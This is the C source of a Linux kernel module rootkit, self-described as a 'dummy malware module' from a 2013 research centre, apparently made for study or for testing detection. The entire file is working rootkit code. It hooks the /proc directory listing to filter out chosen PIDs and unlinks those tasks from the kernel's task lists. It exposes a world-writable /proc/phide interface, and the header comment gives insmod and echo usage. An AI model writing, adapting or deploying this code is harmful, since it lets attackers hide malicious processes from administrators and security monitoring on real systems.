/*
 * Copyright (c) 2013 JST DEOS R&D Center
 */
/*
 * process_rootkit:
 *	dummy malware module to hide specified process from user-land.
 *
 * to enable process-rootkit on your kernel, load the module.
 *
 *	$ sudo insmod process_rootkit.ko
 *
 * to hide specified process, write PID of the process to /proc/phide node.
 *
 *	$ echo <PID> > /proc/phide
 */
//#include <linux/autoconf.h>
#include <generated/autoconf.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/sched.h>
#include <linux/uaccess.h>


MODULE_LICENSE ("GPL");


struct prtkt_pid {
	struct list_head list;
	int pid;
};
static struct list_head prtkt_pid_list;


const char PRKTK_PROC_HIDE_IF[] = "phide";

struct file_operations* prtkt_fops = NULL;
static filldir_t	prtkt_orig_filldir;

static int (*prtkt_orig_readdir) (struct file*, void*, filldir_t);

static inline void
prtkt_pid_delete (int pid)
{
	struct task_struct	*g, *p;
	struct task_struct	*task = NULL;

	do_each_thread (g, p) {
		if (p->pid == pid) {
			task = p;
		}
	} while_each_thread (g, p);

	if (task) {
		write_lock (&tasklist_lock);
		if (thread_group_leader (task)) {
			list_del_init (&task->tasks);
		}
		list_del_init (&(task)->sibling);
		write_unlock (&tasklist_lock);
	}
}

static int
prtkt_filldir (void* __buf, const char* name, int namelen, loff_t offset,
	       u64 ino, unsigned d_type)
{
	struct list_head*	p;
	struct prtkt_pid*	entry;
	int pid = simple_strtol (name, NULL, 10);;

	if (pid <= 0) {
		goto finish;
	}

	list_for_each (p, &prtkt_pid_list) {
		entry = list_entry (p, struct prtkt_pid, list);
		if (entry->pid == pid) {
			return 0;
		}
	}

finish:
	return prtkt_orig_filldir (__buf, name, namelen, offset, ino, d_type);
}

static int
prtkt_proc_readdir (struct file *filp, void* dirent, filldir_t filldir)
{
	prtkt_orig_filldir = filldir;

	return prtkt_orig_readdir (filp, dirent, prtkt_filldir);
}

static int
prtkt_proc_read (char* page, char** start, off_t offset, int count,
		 int* eof, void* data )
{
	int n = 0;
	struct list_head* p;
	struct prtkt_pid* entry;

	list_for_each (p, &prtkt_pid_list) {
		entry = list_entry (p, struct prtkt_pid, list);
		n += sprintf (&page[n], "%d\n", entry->pid);
	}

	return n;
}

static int
prtkt_proc_write (struct file* filp, const char* buf, unsigned long count,
		  void* data)
{
	char buffer[PROC_NUMBUF];
	int pid;
	struct list_head*	p;
	struct prtkt_pid*	entry;

	memset (buffer, 0, sizeof  (buffer));
	if (count > sizeof (buffer) - 1) {
		count = sizeof (buffer) - 1;
	}

	if (copy_from_user (buffer, buf, count)) {
		return -EFAULT;
	}

	pid = simple_strtol (buffer, NULL, 10);
	if (pid <= 0) {
		return -EINVAL;
	}

	list_for_each (p, &prtkt_pid_list) {
		entry = list_entry (p, struct prtkt_pid, list);
		if (entry->pid == pid) {
			return count;
		}
	}

	if ((entry = kmalloc (sizeof (struct prtkt_pid),
			      GFP_KERNEL)) == NULL) {
		return -ENOMEM;
	}
	entry->pid = pid;
	list_add_tail (&entry->list, &prtkt_pid_list);
	prtkt_pid_delete (pid);

	return count;
}

static int __init
prtkt_init (void)
{
	struct proc_dir_entry* entry;
	struct proc_dir_entry* root;

	INIT_LIST_HEAD (&prtkt_pid_list);

	if ((entry = create_proc_entry (PRKTK_PROC_HIDE_IF,
					S_IFREG | S_IRUGO | S_IWUGO,
					NULL)) == NULL) {
		printk ("create_proc_entry failed\n");
		return -EBUSY;
	}

	root = entry->parent;
	if (strncmp (root->name, "/proc", strlen ("/proc")) != 0) {
		return -ENOENT;
	}

	/* replace readir function of the /proc. */
	prtkt_fops = (struct file_operations *) root->proc_fops;
	prtkt_orig_readdir  = prtkt_fops->readdir;
	prtkt_fops->readdir = prtkt_proc_readdir;

	/* set read/write function to /proc/PRKTK_PROC_HIDE_IF. */
	entry->read_proc  = prtkt_proc_read;
	entry->write_proc = prtkt_proc_write;

	return 0;
}

static void __exit
prtkt_exit (void)
{
	struct prtkt_pid* p;
	struct prtkt_pid* tmp;

	if (prtkt_fops != NULL) {
		prtkt_fops->readdir = prtkt_orig_readdir;

		list_for_each_entry_safe (p, tmp, &prtkt_pid_list, list) {
			list_del (&p->list);
			kfree (p);
		}
	}

	remove_proc_entry (PRKTK_PROC_HIDE_IF, NULL);
}

module_init (prtkt_init);
module_exit (prtkt_exit);

/* process_rootkit.c ends here. */
